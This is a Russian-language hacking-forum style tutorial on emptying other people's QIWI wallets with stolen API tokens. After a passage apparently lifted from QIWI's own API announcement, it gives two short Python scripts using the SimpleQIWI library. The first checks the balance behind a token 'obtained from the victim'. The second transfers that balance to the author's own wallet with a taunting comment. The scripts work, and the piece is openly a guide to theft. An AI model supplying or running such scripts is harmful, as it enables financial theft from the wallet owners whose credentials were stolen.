Взлом Qiwi кошелька через API Токен
Life-Hack [Жизнь-Взлом]/ХакингВсем привет, уже существует 100 одинаковых статей о том, как взломать киви. Поэтому я решил сделать 101 такую же статью и может быть рассказать это незнающим. С недавнего времени пользователям Visa QIWI Кошелька доступны новые методы API. Под катом: что это за API, зачем мы его открыли и почему стоит начать им пользоваться уже сейчас.
Массовый пользовательский сервис QIWI Кошелек постепенно переходит на архитектуру микросервисов, поэтому внутри нашей системы компоненты взаимодействуют друг с другом посредством некоего API. Любой пользователь может зайти на сайт, открыть дебаггер и просмотреть, какие запросы браузер отправляет на сервер. Минимальных навыков программиста достаточно, чтобы вытащить отправляемые запросы и использовать их в собственных решениях в обход сайта.
Желающих так схитрить оказалось довольно много. Это и студенты-энтузиасты, которым интересно поковыряться в деталях работы Кошелька, и профессиональные разработчики, желающие интегрировать отдельные функции сайта QIWI Кошелька в свои решения. В итоге параллельно с развитием сайта начала развиваться целая экосистема сторонних решений в «сером» режиме, не легализованном в пользовательском соглашении и не обеспеченным нашим саппортом.
Выводим деньги через скрипт
Как вывести деньги с Qiwi кошелька с помошью Qiwi токена? Нам понадобится Python 3,6 (если нету, то устанавливаем).
Заходим в папку с питоном, далее в папку Scripts и создаем bat файл с кодом:
pip install SimpleQIWI
У вас начнётся загрузка. После того, как установится компонент, создаем файл Balance_Check.py
Пишем туда код:
from SimpleQIWI import * print(‘Q I W I Software 1.0 / coded by m1wka!’); token=input(‘Enter token: ‘) phone=input(‘Enter phone: ‘); api = QApi(token=token, phone=phone) print(‘Balance Founded’) print(api.balance) input()
Всё, мы сделали себе чекер для проверки балансов! Чтобы проверить баланс открываем файл Balance_Check.py Где написано Enter Token вставляем токен полученый у жертвы или свой.
Далее жмём Enter. Будет написано Enter Phone: Писать его необязательно (можем просто нажать Enter)
qiwi Software 1.0 / coded by m1wka! Enter token: c0563229e1e79063a0edc2c4d70808f Enter phone: 3 Balance Founded [0.0, 2497.12]
Вот – это наш баланс. Далее я расскажу вам как вывести всё это дело. Создаём ещё один файл, называем Vivod Babla.py
Открываем его с помощью текстового документа и вставляем код:
from SimpleQIWI import * print(‘Q I W I Software 1.0 / coded by m1wka!’); token=input(‘Enter token: ‘) phone=input(‘Enter phone: ‘); api = QApi(token=token, phone=phone) print(‘Balance Founded’) print(api.balance) api.pay(account=”ваш номер киви”, amount=сумма, comment=’сорри бро что ... твои бабки’) print(api.balance) input()
Закрываем текстовик.
Открываем файл Vivod Babla с помошью Python, вставляем ключ и деньги автоматически отправляются вам на кошелёк.